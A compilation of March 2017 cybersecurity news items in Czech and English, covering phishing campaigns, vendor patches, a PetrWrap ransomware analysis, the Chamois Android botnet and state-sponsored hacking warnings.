„V předchozích dnech byl zaznamenán podvodný e-mail vyzývající k úhradě dlužné částky a vyhrožující případným exekučním řízením,“ podotkl Pavel Bašta, bezpečnostní analytik CSIRT.CZ.
Podle něj se snaží kyberzločinci touto cestou nalákat důvěřivce na podvodné webové stránky. „Kromě podrobného návodu k platbě dlužné částky vede navíc uživatele na webovou stránku imitující skutečný web jednoho z exekutorských úřadů a zde ke stažení a spuštění malwaru,“ zdůraznil Bašta.
Motivace počítačových pirátů je tak zřejmá. Jednak se snaží z důvěřivců pod pohrůžkou exekuce vymámit finanční prostředky, jednak chtějí propašovat do počítače důvěřivců nezvaného návštěvníka – počítačový virus.
Neklikat na odkazy, neotvírat přílohy
„Odkaz vede na doménu exekutor.site místo executor.cz. V těle e-mailu se mimo jiné doporučuje nedbat na varování antivirového softwaru,“ doplnil bezpečnostní analytik. Sluší se nicméně podotknout, že podvodné zprávy mohou být rozesílány klidně i ze zcela jiných adres.
Od podvodných zpráv se již distancoval i exekutorský úřad. „Neotvírejte přílohy a neklikejte na odkazy obsažené v tomto podvodném e-mailu. Náš úřad nikdy nerozesílá výzvy e-mailem, ale pouze v papírové podobě nebo datovou schránkou,“ uvedli zástupci Exekutorské komory.
Prakticky totožný trik s exekuční výzvou zkoušeli počítačoví piráti už před dvěma roky. Tehdy český internet zaplavily doslova tisíce podvodných e-mailů, ve kterých kyberzločinci vyzývali příjemce k úhradě neexistujících pohledávek.
Hacker částečně prolomil zabezpečení nové herní konzole Nintendo Switch, může za to použití zastaralého WebKitu
15.3.2017 Novinky/Bezpečnost Zabezpečení
Neuběhl ani celý měsíc od spuštění oficiálních prodejů nové herní konzole Switch od Nintenda a hackerům se podařilo částečně prolomit („jailbreak“) zabezpečení a získat tak přístup k vnitřním systémům konzole.
Úspěšný hack, který je potřeba k získání plnohodnotného jailbreaku, oznámil na Twitteru hacker s přezdívkou qwertyoruiop, který ukázal fotografii s nápisem „done“ v prohlížeči Nintendo Switch. Prohlížeč je přitom zatím v systému ukrytý a používá se pouze pro potřeby připojení k veřejné Wi-Fi a podobně. Problém ale je, že tento prohlížeč je postavený na půl roku starém WebKitu, takže nemá opravené chyby, jež se během této doby objevily a které útočník použil pro prolomení.
Follow
qwertyoruiop @qwertyoruiopz
that's just how it goes
4:36 AM - 11 Mar 2017
1,012 1,012 Retweets 2,473 2,473 likes
K hacknutí dokonce použil stejné nástroje jako pro iOS, který v rámci prohlížeče Safari stejnou chybu opravil už ve verzi iOS 9.3.5. I když se ještě nejedná o kompletní jailbreak, lze počítat s tím, že v rámci této chyby se lze dostat na další úrovně a nakonec získat „roota“ a plnou kontrolu nad systémem. Potom bude možné na zařízení provozovat aplikace, které Nintendo neschválilo a neprošly obchodem s aplikacemi, třeba i různé emulátory a do budoucna i pirátské verze her.
Uvidíme, jak se Nintendo s tímto problém popere, ale je jisté, že stejně jako u jiných systémů s uzavřeným modelem (iOS zařízení, herní konzole od Sony a Microsoftu a podobně), se budou hackeři neustále snažit najít nové díry a zneužít je k získání kompletní kontroly nad zařízením.
Počítačový zločin se více etabluje jako byznys
15.3.2017 SecurityWorld Kriminalita
Experti na počítačovou bezpečnost se sešli v Praze na konferenci IDC Security Roadshow 2017, aby diskutovali nad aktuálními trendy v oblasti kybernetických hrozeb v kontextu vývoje informačních a komunikačních technologií.
Podniky i veřejné instituce v dnešní době čelí širokému spektru kybernetických bezpečnostních hrozeb různé intenzity a rozsahu. V dnešní době jsou mnohem častěji než dříve tyto hrozby motivovány finančními nebo špionážními důvody, přibývá také útoků motivovaných politickými cíli, přičemž stoupá objem zdrojů, které mají útočníci k dispozici.
„Kyberzločinci provozují svoji činnost jako podnik a průniky skrze zabezpečení jsou pro ně obchodním cílem. Stejně jako kterýkoli jiný podnik tedy investují prostředky do naplnění svých cílů snaží se svůj podnik rozvíjet,“ říká Mark Child, vedoucí analytik pro oblast kybernetické bezpečnosti v pražské pobočce společnosti IDC.
„Podniky a organizace nemohou v dnešní době se založenýma rukama čekat, až dojde k bezpečnostními incidentu či průniku do sítě, ale musí se k obraně stavět aktivně a vyhledávat indikátory hrozeb,“ vysvětluje Mark Child. „Tradiční přístup založený na vzorcích známého škodlivého softwaru nebo znacích útoků má stále své místo, avšak je nutné jej kombinovat s novými postupy založenými na strojovém učení a umělé inteligenci.“
Podle průzkumu společnosti IDC zůstává pro podniky hlavním kritériem při volbě dodavatele bezpečnostních produktů a řešení cena, před faktory, jako jsou zkušenosti dodavatele v daném oboru, reference, certifikace a spektrum nabízených funkcí či služeb. Zároveň 30 % subjektů nijak neměří efektivitu vynaložených nákladů na IT bezpečnost.
Microsoft Patches Many Exploited, Disclosed Flaws
15.3.2017 securityweek Vulnerebility
Microsoft has released a total of 18 security bulletins to address tens of vulnerabilities, including more than a dozen that have already been publicly disclosed or exploited in attacks.
The March 2017 updates also include the patches that should have been released last month. Microsoft postponed most of the February security updates – except the updates that fixed Flash Player flaws – due to an unspecified “last minute issue.”
The latest security updates patch critical and important vulnerabilities in Windows, Edge, Internet Explorer, Office, Skype, Lync and Silverlight.
The advisories published by Microsoft show that 12 of the vulnerabilities have been publicly disclosed, including an SMB-related denial-of-service (DoS) flaw in Windows (CVE-2017-0016), a Windows kernel privilege escalation (CVE-2017-0050), a remote code execution bug in a graphics component (CVE-2017-0014), a DoS issue in Office (CVE-2017-0029), and a Hyper-V DoS vulnerability (CVE-2017-0097).
The list of flaws whose details have been made public also includes information disclosure vulnerabilities in Edge (CVE-2017-0065) and Internet Explorer (CVE-2017-0008), several spoofing flaws in the two web browsers (CVE-2017-0012, CVE-2017-0033, CVE-2017-0069), and memory corruption and privilege escalation issues in Internet Explorer (CVE-2017-0037, CVE-2017-0154).
In February, Google Project Zero disclosed the details of a medium-severity information disclosure flaw affecting the Windows Graphics Device Interface (GDI). The security hole, tracked as CVE-2017-0038, has been addressed, but Microsoft’s advisory erroneously shows that it has not been disclosed.
There are three vulnerabilities that, according to Microsoft, have been exploited in attacks before patches were made available.
One of them is CVE-2017-0149, a memory corruption vulnerability affecting Internet Explorer. The weakness allows an attacker to execute arbitrary code in the context of the current user by getting the target to access a specially crafted website or open a malicious email attachment.
Another zero-day is CVE-2017-0005, a privilege escalation vulnerability caused due to the way the Windows GDI component handles objects in memory. The flaw allows an authenticated attacker to run arbitrary code in kernel mode, Microsoft said.
The third zero-day has been described as an XML Core Services information disclosure vulnerability (CVE-2017-0022), which allows an attacker to test for the presence of files on the disk.
Microsoft has not shared any information on the attacks involving these zero-days, but security firms could provide more details in the upcoming days.
Adobe released security updates on Tuesday to address a total of eight vulnerabilities in Flash Player and Shockwave Player. One of the bulletins released by Microsoft addresses the Flash Player flaws in the libraries used by Internet Explorer and Edge.
Microsoft intends to stop publishing security bulletins and instead provide security update information on the new Security Update Guide website. However, in an effort to make the transition easier for customers, the company has published security bulletins as well this month.
Decryption Tool Released for FindZip macOS Ransomware
15.3.2017 securityweek Virus
macOS users who had their systems infected with the FindZip ransomware can now use a decryption tool to restore their files without paying the ransom.
The ransomware was spotted last month by ESET, which detects it as OSX/Filecoder.E. An update to Apple’s XProtect signatures, however, started calling it FindZip soon after. Spreading through piracy sites, the threat masquerades as cracks for Adobe Premier Pro and Microsoft Office, and also feature signed certificates, though not by Apple.
FindZip is only the second piece of ransomware to target Mac users, but that doesn’t make it less destructive. In fact, the security researchers who analyzed the malware said at the time that victims had no way of recovering their files, because the malware was destroying the encryption key before attempting to communicate with the command and control server to send it to the attacker.
Because of that, the researchers recommended that users should not pay the ransom, as the attackers were believed to have no means of restoring encrypted files. However, while the recommendation remains, it appears that victims can recover their data, and can do so for free.
At the end of February, Malwarebytes Labs researchers published a post about how victims could restore their data using Xcode or TextWrangler, Xcode command-line tools, pkcrack source code, and both the encrypted and unencrypted versions of a file. A second computer or a different account on the compromised machine was also required, along with some technical knowledge.
Courtesy of Avast’s FindZip decryption tool, however, things are a bit simpler, and users can decrypt their files on either a Mac or a Windows machine. In fact, those victims who port their files from a Mac to Windows won’t need additional resources to install and use the decryptor, the researchers say.
On Mac or Linux, however, an emulation layer for Windows applications is required, and the tool has been already tested with CrossOver and Wine, though Avast says that other emulation programs might work as well. The decryption tool was tested on macOS 10.10 (Yosemite) and macOS 10.12 (Sierra).
Victims first need to install a windowing system for Mac, such as XQuartz, which is required to run Wine for Mac. If Wine was installed prior to the infection, chances are that all files are encrypted, and users are advised to delete the folder \Users\<YourUserName>\.wine before running the decryptor application.
When running the decryption tool, users might be prompted to install Mono, or Gecko, and Avast notes that they should hit Cancel if Mono is requested. After getting the application running, users will be required to select a location for the decrypted files, as well as a pair of original/encrypted files. At this point, they only need to wait for the tool to find the decryption password, and then start the recovery process. Users are advised to also opt-in to having the encrypted files backed up first.
PetrWrap: the new Petya-based ransomware used in targeted attacks
14.3.2017 Kaspersky Virus
This year we found a new family of ransomware used in targeted attacks against organizations. After penetrating an organization’s network the threat actors used the PsExec tool to install ransomware on all endpoints and servers in the organization. The next interesting fact about this ransomware is that the threat actors decided to use the well-known Petya ransomware to encrypt user data. As you may know, this family of ransomware has a RaaS model, but the threat actor decided not to use this ability. To get a workable version of the ransomware, the group behind PetrWrap created a special module that patches the original Petya ransomware “on the fly”. This is what makes this new malware so unique.
Tech details
The PetrWrap Trojan is written in C and compiled in MS Visual Studio. It carries a sample of the Petya ransomware v3 inside its data section and uses Petya to infect the victim’s machine. What’s more, PetrWrap implements its own cryptographic routines and modifies the code of Petya in runtime to control its execution. This allows the criminals behind PetrWrap to hide the fact that they are using Petya during infection.
Modus operandi
After being launched PetrWrap delays its execution (sleeps for 5400 seconds = 1.5 hours). After that it decrypts the main DLL of Petya from its data section and gets ready to call its exported function ZuWQdweafdsg345312. This function normally prepares Petya for further operations and starts the MBR overwrite process. PetrWrap, however, needs to hook a couple of Petya’s functions first, so it replaces the instructions that call Petya’s DllEntryPoint with NOPs (hex bytes 0x90). This prevents Petya from proceeding on its own and allows PetrWrap to make all the necessary computations and preparations before letting it continue.
Main function of PetrWrap
After that PetrWrap makes the necessary cryptographic computations (we’ll discuss them in more detail below), hooks two Petya procedures (which are responsible for the generation of the configuration data, dubbed petya_generate_config, and for the MBR overwrite process, dubbed petya_infect) and then passes the execution to Petya. For more information on what the original Petya was capable of, please see our previous publication.
Cryptographic scheme
Normally, Petya generates a 16-byte key and uses the Salsa20 cipher to encrypt the MFT of the NTFS partitions found on local drives. To make decryption possible only by its operators, it uses the Elliptic Curve Diffie-Hellman (ECDH) key agreement algorithm with the curve secp192k1 and a public key is embedded into Petya’s body.
The criminals behind PetrWrap faced a problem: if they used Petya as is, they would be unable to decrypt the victim’s machine because they would need the Petya operators’ private key. So what they decided to do was to completely replace the ECDH part of Petya with their own independent implementation and use their own private and public keys.
PetrWrap implementation uses cryptographic routines from OpenSSL (whereas Petya used the mbedtls library) and proceeds as follows:
The Trojan contains an embedded public key master_pub (which is a point on the curve prime192v1 which is again different from the one chosen by Petya);
During each infection PetrWrap generates a new pair of session keys ec_session_priv + ec_session_pub;
Computes ecdh_shared_digest = SHA512(ECDH(master_pub, ec_session_priv));
‘Intercepts’ the salsa key generated by Petya and encrypts it using ecdh_shared_digest (there are a number of semi-useless manipulations which come down to essentially encrypting the salsa key with AES-256 using different parts of ecdh_shared_digest as the key and IV);
Constructs user_id which is a string representation that contains the encrypted salsa key and the ec_session_pub;
Passes this user_id to Petya, which uses it as if it was its own data (puts it into the configuration for the bootloader to be shown to the user after the PC reboot).
The ECDH shared key computation implemented in PetrWrap
Hooked procedures
PetrWrap hooks two procedures in Petya which we will call petya_infect and petya_generate_config and replaces them with its own procedures dubbed wrap_infect and wrap_generate_config.
wrap_infect implements the following functionality:
saves the salsa key generated by Petya for further use;
patches the Petya bootloader code and ransom text in order to skip the flashing skull animation and to wipe all mention of Petya in the ransom message;
passes execution to the original petya_infect procedure.
wrap_generate_config in turn does the following:
calls the original petya_generate_config procedure;
generates the user_id string according to the algorithm described in the previous paragraph;
replaces Petya’s id string with this newly generated user_id.
The screen of the infected machine
Technical summary
As a result of all the manipulations described above, PetrWrap achieves the following goals:
The victim’s machine is locked and the MFT of NTFS partitions is encrypted securely (because Petya v3 which is used in this attack doesn’t have flaws of the earlier versions and implements Salsa20 correctly);
The lockscreen doesn’t show the flashing skull animation and doesn’t contain any mentions of Petya which makes it harder to assess the situation and determine the extent of the caused damage;
The developers of PetrWrap didn’t have to write the low-level bootloader code and risk making mistakes similar to the ones observed in earlier versions of Petya.
Decryption
Unfortunately, this family of ransomware uses a strong encryption algorithm, meaning a decryption tool is out of the question. However, victims can try restoring files using third-party tools such as R-Studio.
Detection
Kaspersky products successfully detect this ransomware as Trojan-Ransom.Win32.PetrWrap and PDM:Trojan.Win32.Generic.
Conclusion
Targeted attacks on organizations with the main aim of encrypting data are becoming more popular. The groups using ransomware in their targeted attacks usually try to find vulnerable servers or servers with unprotected RDP access. After penetrating an organization’s network they use special frameworks like Mimikatz to obtain the necessary credentials for installing ransomware throughout the network. To protect against such attacks, organizations need to keep their server software up to date, use secure passwords for remote access systems, install security solutions on their servers and use security solutions with behavioral detection components on their endpoints.
Sample MD5
17c25c8a7c141195ee887de905f33d7b – Trojan-Ransom.Win32.PetrWrap.b
SAP Patches Five Vulnerabilities in HANA Database Platform
14.3.2017 securityweek Vulnerebility
SAP this week released another set of monthly security updates to address various issues in its products, including five vulnerabilities in SAP HANA, one of which was rated Hot News.
The March 2017 SAP Security Patch Day includes 25 security notes, SAP announced. Additionally, there were two updates to previously released security notes, for a total of 27 SAP Security Notes released this month. One Security Note has a Very High priority rating, while other 7 were rated High severity.
According to ERPScan, a company that specializes in securing SAP and Oracle applications, the patch update includes 35 SAP Notes (28 SAP Security Patch Day Notes and 7 Support Package Notes), with 4 of the Notes released after the second Tuesday of the previous month, and 7 Notes being updates to previously released Security Notes.
The most important of the issues addressed this month was a Missing Authorization Check vulnerability in the SAP HANA User Self-Service. With a CVSS score of 9.8 (Very High), this critical bug could allow an attacker to take control of the affected system, SAP’s Holger Mack reveals.
The Self Service tool for SAP HANA provides the option to activate features such as password change, forgotten password reset, or user self-registration. The Hot News vulnerability could allow an unauthenticated attacker to impersonate other users, even those of high privileged accounts, security technology firm Onapsis explains. The attacker could take full control of the SAP HANA platform remotely.
According to SAP, however, the issue only affects customers who enabled the optional User Self Service component (it is disabled by default) and exposed it to an untrusted network. “The security note contains instructions on how to check if the User Self Service tool is enabled and how to protect the system by either updating or deactivating the affected service (if not needed anymore or as temporary measure),” Mack says.
With a CVSS score of 8.8 (High risk), the second most important flaw addressed this month (also discovered by Onapsis) was affecting SAP HANA as well: a session fixation vulnerability in SAP HANA extended application services, classic model. By exploiting it, an authenticated attacker could predict valid session IDs for concurrent users that are logged on to the system.
The remaining three vulnerabilities in SAP HANA were also found by Onapsis: two SQL Injection vulnerabilities with a CVSSv3 Base Score of 2.7, and an information disclosure in SAP HANA Cockpit for offline administration, with a CVSSv3 Base Score of 4.9.
“The risk of these SAP HANA vulnerabilities is critical indeed. However, the likelihood of mass-exploitation is low as SAP HANA User Self-Service is enabled only on 13% internet-exposed SAP systems (according to a custom scan). There are numerous other services in SAP HANA, which are not enabled by default and susceptible to critical issues. For example, last month we helped SAP to close vulnerability with the same risk of remote authentication bypass but in other web service dubbed Sinopia,” Alexander Polyakov, CTO at ERPScan, says.
In addition to the aforementioned bug in SAP HANA, the High risk flaws patched this month include a Remote Code Execution (RCE) vulnerability in SAP GUI for Windows, Denial of service (DOS) in Visual Composer, Denial of service (DOS) in SAP Netweaver Dynpro Engine, Improved security for HTTP URL outgoing connections in SAP Netweaver, and an update to a previous Security Note.
The RCE (CVSS Base Score: 8.0) and two DOS flaws (CVSS Base Score: 7.5 each) were found by ERPScan, along with a Cross-Site Scripting (XSS) vulnerability in SAP Enterprise Portal (CVSS Base Score: 6.1) and a Denial of service vulnerability in SAP Java Script Engine (CVSS Base Score: 2.7).
A total of 11 XSS flaws were addressed this month, along with 7 missing authorization checks, 5 DOS issues, 4 SQL Injection vulnerabilities, 3 Information disclosure bugs, 2 Implementation flaws, 1 RCE, 1 XML external entity, and 1 session fixation.
HSBC Users Targeted With Fake Security Software
14.3.2017 securityweek Crime
A recent spam campaign impersonating UK-based banking giant HSBC is attempting to distribute malware masquerading as legitimate security software, Symantec researchers warn.
The spam emails were designed look as though they had been sent by HSBC, and even display an "@hsbc.com" email address. The messages claim to be distributing malware detection software Rapport from Trusteer (acquired by IBM in 2013), which is a legitimate security program designed to protect online bank accounts from fraud. However, users are being connected to a malicious information stealing application instead. What’s more, the malware uses Windows GodMode to keep itself hidden on the compromised machines, the researchers say.
The spam messages feature security advisory information and eco-friendly messaging, in an attempt to look more convincing. The email even warns recipients against opening attachments from unknown or non-trustworthy sources, but also includes a series of elements that clearly suggest it isn’t as legitimate as it pretends to be.
For example, the email subject line features the phrase “Payment Advice” followed by a large gap and then 10 random characters, the language and sentence structure in the email are suspicious, with some not making sense at all, and the email has a “virus detection software” as attachment, and not “payment advice,” as claimed. Moreover, the email features a .7z attachment, which legitimate emails wouldn’t (legitimate emails wouldn’t deliver antivirus software either).
The .7z file includes the fake Rapport executable and an Instruction.jar file. When executed, the malware creates a folder for itself, and then hides it by leveraging the Windows GodMode (also known as Windows Master Control Panel shortcut, it offers access to various control settings in some Windows variants, and various malware families have been abusing it for persistency).
After a successful infection, the malware modifies registry entries (to disable notifications) and a series of system tools, in an attempt to shield itself. Next, the Trojan starts the communication with the command and control (C&C) server, allowing the remote attacker to steal information from the compromised machine.
The spam run was active for 24 hours from February 10 through February 11, but Symantec suggests that it could be part of a larger campaign, given that similar themed HSBC themed emails mentioning payment advice have been observed on other occasions (with emails were featuring Themida-packed information-stealing malware), Symantec says.
Last year, a spam campaign was observed spreading Panda Banker and abusing HSBC’s name (and the name of other institutions, depending on the targeted users), while a more recent attack was distributing the Adwind RAT via emails supposedly coming from the HSBC Advising Service (from the mail.hsbcnet.hsbc.com domain).
Adobe Patches Vulnerabilities in Flash, Shockwave
14.3.2017 securityweek Vulnerebility
Security updates released by Adobe on Tuesday patch seven vulnerabilities in Flash Player and one vulnerability in Shockwave Player.
Flash Player 25.0.0.127 fixes critical security holes that affect version 24.0.0.221 and earlier on Windows, Mac, Linux and Chrome OS. Adobe has found no evidence of exploitation in the wild.
The vulnerabilities include buffer overflow, use-after-free and other memory corruption issues that can lead to arbitrary code execution. The latest version also addresses an information disclosure problem related to a random number generator.
The weaknesses were reported to Adobe by researchers at Qihoo 360, Palo Alto Networks, the Nanyang Technological University in Singapore, and an expert who wanted to remain anonymous.
In the case of Shockwave Player, version 12.2.8.198 for Windows patches an important privilege escalation flaw (CVE-2017-2983) related to the directory search path used to find resources.
The flaw was disclosed responsibly by Nitesh Shilpkar and there is no evidence that it has been exploited for malicious purposes.
Last month, Adobe patched more than a dozen code execution vulnerabilities in Flash Player, and several other bugs in Digital Editions and the Campaigns marketing tool.
Facebook Bans Developers From Using Data for Surveillance
14.3.2017 securityweek Social
Facebook this week announced an update to its platform policies to ban developers from using data obtained from the company to build surveillance tools.
The change was made not only to the Facebook platform policy, but to the Instagram’s as well, and impacts all developers interested in using the Facebook and Instagram APIs to build applications and services.
Starting this week, the first data protection policy listed on Facebook for Developers (the same as the 28th general term on the Instagram platform policy page) also reads “don't use data obtained from us to provide tools that are used for surveillance.” Previously, it only required developers to protect the information received from the company “against unauthorized access, use, or disclosure.”
Earlier this year, software security startup Fallible revealed that many Android applications unnecessarily store keys or secrets (which could leak sensitive data) related to some of the most popular online services, Instagram included (along with Twitter, Flickr, Dropbox, Slack, Uber, and Amazon AWS).
Facebook is determined to both make the policy explicit and enforce it. Over the past several months, the company has been working with the American Civil Liberties Union of California (ACLU), Color of Change, and the Center for Media Justice on this update and on increasing the public awareness on the issue.
“Over the past several months we have taken enforcement action against developers who created and marketed tools meant for surveillance, in violation of our existing policies; we want to be sure everyone understands the underlying policy and how to comply,” Rob Sherman, Deputy Chief Privacy Officer, Facebook, says.
In October last year, Facebook (and Twitter) cut access to certain data for analytics firm Geofeedia after an ACLU report revealed that Geofeedia’s social media monitoring product was being “marketed to law enforcement as a tool to monitor activists and protesters.” The report was referring to the wave of protests in the Missouri community after the police shooting of an unarmed African-American man and also stated that “law enforcement has used Geofeedia to monitor protests.”
“Over the years, we have learned the importance of updating these policies to offer more clarity or incorporate constructive feedback. These changes help us improve our community and discourage unwanted behavior,” Sherman also notes.
Recently, Facebook updated its Advertising Policies to ban ads that promote payday loans, after an update last year more explicitly prohibited various kinds of discriminatory advertising. Future policy updates are to be expected as well, as the company works to “support our community,” Sherman concludes.
Home Depot to Pay Banks $25 Million for 2014 Breach
14.3.2017 securityweek Crime
Home Depot has agreed to pay $25 million to the financial institutions affected by the massive data breach suffered by the retailer in 2014, when cybercriminals managed to steal email addresses and payment card data belonging to more than 50 million customers.
The retail giant will create a $25 million settlement fund that will be distributed among affected financial institutions.
Organizations that submit claims can receive $2 for each of the payment cards for which they received alerts as a result of the breach, without providing any documentation. Companies that do provide documentation can recover up to 60 percent of losses.
In addition, Home Depot is prepared to pay a total of up to $2.250,000 to sponsored entities whose legal claims against the company were released by their sponsor.
As part of the settlement, Home Depot has also agreed to improve its data security practices in an effort to avoid similar incidents in the future, court documents show.
Fortune reported that the retailer has already paid out more than $134 million to Visa, MasterCard and other financial organizations.
As for the lawsuit filed by affected consumers, Home Depot last year agreed to pay at least $19.5 million to settle charges, including for reimbursements and identity protection services. The total cost of the breach is at least $179 million.
Home Depot’s investigation revealed that cybercriminals had access to the company’s systems between April and September 2014. The attackers used custom-built malware to steal payment cards and other customer data without being detected.
Google Blocks Sophisticated Android Botnet
14.3.2017 securityweek BotNet
Google recently discovered and blocked a sophisticated fraud botnet that was being distributed through multiple channels and which employed several methods to avoid detection.
Dubbed Chamois, the botnet is was one of the largest Potentially Harmful Application (PHA) families seen on Android to date, and could remain persistent on infected devices by not showing in the application list at all. The malicious program was also capable of generating revenue by engaging into numerous activities, Google says.
Android_Botnet-Takedown
The malicious apps based on Chamois that Google analyzed could generate invalid traffic through ad pop-ups by displaying deceptive graphics inside the ads; could perform artificial app promotion by automatically installing apps in the background; could perform telephony fraud by sending premium text messages; and could also download and execute additional plugins on the compromised devices.
The malicious apps didn’t appear in the device's app list, which prevented users from removing them. Furthermore, the deceptive graphics used to trick users into clicking ads could sometimes result in additional malicious applications being downloaded onto the device, such as SMS fraud programs.
In addition to staying well hidden on Android devices, Chamois had other features that made it unusual as well, such as a multi-staged payload, with its code being executed in 4 distinct stages using different file formats.
“This multi-stage process makes it more complicated to immediately identify apps in this family as a PHA because the layers have to be peeled first to reach the malicious part. However, Google's pipelines weren't tricked as they are designed to tackle these scenarios properly,” Security Software Engineers Bernhard Grill, Megan Ruthven, and Xin Zhao explain.
The PHA attempted to evade detection with the help of obfuscation and anti-analysis techniques, while also using a custom, encrypted file storage for its configuration files, along with additional code that required deeper analysis. Chamois also featured a great deal of (over 100,000 lines of) “sophisticated code written by seemingly professional developers,” Google’s engineers say.
To block the threat, Google used Verify Apps, in addition to kicking out “bad actors who were trying to game our ad systems.” With the help of Verify Apps, users are automatically warned when downloading apps that are considered PHAs, and they can also find and remove such threats if they have been already installed, even if they don’t appear in the application list, as was the case with Chamois.
According to Google, Verify Apps was also meant to monitor the state of the Android ecosystem for anomalies, as well as to investigate the ones that it finds, and leverages behavior analysis on devices to discover PHAs. Many of the applications that Chamois downloaded were highly ranked by the Dead or Insecure (DOI) scorer (apps that have a high chance of being downloaded by devices that are no longer checking up with Verify Apps are considered DOI apps).
UK NCSC warns of cyber attacks powered by Russia against the political system
14.3.2017 securityaffairs BigBrothers
The UK National Cyber Security Center (NCSC) is warning of Russian political hacking capabilities, the risk of cyber attacks against the political system is high.
The alert was raised by the UK National Cyber Security Center (NCSC) that is informing political parties in the UK to warn about “the potential for hostile action against the UK political system.”
The warning doesn’t confirm that Russia is the most dangerous state for political hacking but the intelligence community has no doubts about cyber capabilities of Russians state-sponsored hackers.
In a separate context, the British Foreign Secretary Boris Johnson explained that there is no evidence of cyber attacks powered by Russian entities against the Brutish politicians and parties.
“We have no evidence the Russians are actually involved in trying to undermine our democratic processes at the moment. We don’t actually have that evidence. But what we do have is plenty of evidence that the Russians are capable of doing that.” Johnson declared on national television Sunday. Ha also referred the cyber attacks against the French TV TV4Monde and the diversionary strategy adopted by Russian hackers.
“There is no doubt that they have been up to all sorts of dirty tricks – bringing down French TV stations; you have seen what happened in the United States where there is no question at all they were involved in the hacking of the Democratic National Convention.”
Last year, the US government accused Russia of cyberattacks against American political organizations, the Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI) published a Joint Analysis Report(JAR) that includes information about the tools, infrastructure and TTPs used by the Russian civilian and military intelligence Services (RIS) against United States election.
U.S. Government linked the cyber activity to a Russian threat actor designated as GRIZZLY STEPPE. It was the first time that the JAR attributes a malicious cyber activity to specific countries or threat actors.
The fear of possible attacks powered by Russian hackers is shared among multiple European Governments.
In January, French Defense Minister Le Drian expressed concerns about cyber attacks against defense systems and warns of hacking campaigns on the upcoming elections.
The Minister warned of possible cyber attacks like the ones that targeted the 2016 US Presidential Election.
In France, the conservative candidate Francois Fillon has been praised by Russian president Vladimir Putin due to its intention to intensify the relationship with the Kremlin. On the other side, the candidate Marine Le Pen is in total opposition to Russia, for this reason, the experts believe that hackers could target him and his party.
Relations between Russia and France are not good due to the position of President Hollande on the dispute between Russia and Ukraine in the 2014 Crimean Crysis.
President Hollande also blamed Russia for war crimes over its bombardment of the Syrian city of Aleppo.
The Minister is overseeing an overhaul of the cyber-security operations conducted by his Government.
In November 2016, the Gorman government expressed concerns about possible interference of Russian nation-state hackers with the 2017 German election.
NCSC GCHQ
The German politicians fear the Kremlin’s cyber capabilities. The alleged Russian interference in the US Presidential election is unleashing a domino effect and insinuating the fear in governments.
“I don’t have any concrete information about the origin of the attacks on the Telekom network,” Chancellor Angela Merkel said on Tuesday in Berlin. “Let me just say that such cyberattacks, or ‘hybrid attacks’ as they’re known in Russian doctrine, are part of everyday life today, and we need to learn to deal with them.”
The Germany’s Interior Minister Thomas de Mazière expressed a great concern for explicitly blaming Moscow.
“It’s possible that we can’t clearly distinguish between criminal activities launched from a certain country and state activities,” Maizière declared at a conference of federal state interior ministers in Saarbrücken, when asked if Moscow was responsible for the attacks against the German routers.
The new president of German intelligence service (BND), Bruno Kahl, confirmed that foreign hackers can try to launch cyber attacks in the attempt to “delegitimize the democratic process” in the country.
“In an interview with the Süddeutsche Zeitung newspaper, Bruno Kahl – the new president of German intelligence service, the BND – complained about hackers trying to “delegitimize the democratic process as such” and said he had “indications” that the hacks “came from certain quarters,” namely Russia. And the Telekom hack is by no means the only attack of its kind in Germany.” reported DW.com.
Back to the warning issued by the GCHQ, in a letter sent to the British political parties, the NCSC chief executive Ciaran Martin invited to stay sharp on cyber attacks against their infrastructure in the attempt to subvert democratic processes in the country.
“You will be aware of the coverage of events in the United States, Germany and elsewhere reminding us of the potential for hostile action against the UK political system. This is not just about the network security of political parties’ own systems. Attacks against our democratic processes go beyond this and can include attacks on parliament, constituency offices, thinktanks and pressure groups and individuals’ email accounts.” Martin wrote in the letter.
“Protecting the UK’s political system from hostile cyber-activity is one of our operational priorities, so we have signposted parties to existing guidance and will deliver tailored seminars on cyber-security measures. The seminars will build on our existing advice and will provide an overview of threats, case studies on recent cyber-incidents, practical steps to reduce the risk and advice on incident management.”
Google Kicks Out Largest Android Adware Family From The Play Store
14.3.2017 thehackernews Android
With the rise in the mobile market, Adware has become one of the most prevalent mobile threats in the world. Adware has traditionally been used to aggressively push ads like banners or pop-ups on mobile screens to make money.
The troublesome part is that Adware is now becoming trojanized and more sophisticated, as it aggressively collects personal data from the mobile device it's installed on, including name, birth date, location, serial number, contacts, and browser data without users' consent.
However, the risk is a bit higher on Android than other platforms because of the extra permissions that apps enjoy.
Although Google has stepped up its efforts to remove potentially harmful apps from its Play Store in the past years and added more stringent malware checks for new apps, Adware app eventually finds its way into its mobile app marketplace to target millions of Android users.
In its recent efforts to make its Play Store ecosystem safe, Google has recently discovered a new massive ad-fraud family of a botnet that was infecting Android users through apps hosted on its official Play Store.
Dubbed Chamois, the family of PHAs (potentially harmful applications) was capable of bombarding users with pop-up ads, boosting app promotion by automatically installing other applications in the background, subscribing users to premium services by sending text messages and downloading additional plugins without their knowledge.
Google engineers said they caught Chamois after they discovered suspicious ad traffic while performing a routine ad traffic quality evaluation.
Despite the fact that the app uses obfuscation and anti-analysis techniques to evade detection, Google engineers eventually uncovered a massive network of developers that had tricked users into installing malicious apps on their phones.
The goal behind the malware-laced apps appears to have been ad fraud and make money by employing different techniques to bypass Google's detection and prevention systems.
"We analyzed malicious apps based on Chamois, and found that they employed several methods to avoid detection and tried to trick users into clicking ads by displaying deceptive graphics," security software engineers at Google said in a blog post.
"This sometimes resulted in downloading of other apps that commit SMS fraud. So we blocked the Chamois app family using Verify Apps and also kicked out bad actors who were trying to game our ad systems."
The Chamois apps had a multi-stage payload structure, including a custom encrypted storage area for configuration files and additional code, which required deeper analysis to understand the malicious part.
According to the Google engineers, their security teams had to look through more than 100,000 lines of sophisticated code written by seemingly professional developers in an effort to figure out exactly what the Chamois-related apps were up to.
After the discovery of Chamois, Google blocked the Chamois app family using its Verify Apps and also banned some people who were trying to take advantage of its ad system to make money on the adware apps.
Google also updated its app testing system that is now capable of detecting this new Chamois-related threat.
VMware Preparing Patches for "Catastrophic" Struts Flaw
14.3.2017 securityweek Vulnerebility
VMware informed customers on Monday that the recently disclosed Apache Struts2 vulnerability, which has been exploited in the wild over the past week, affects several of its products.
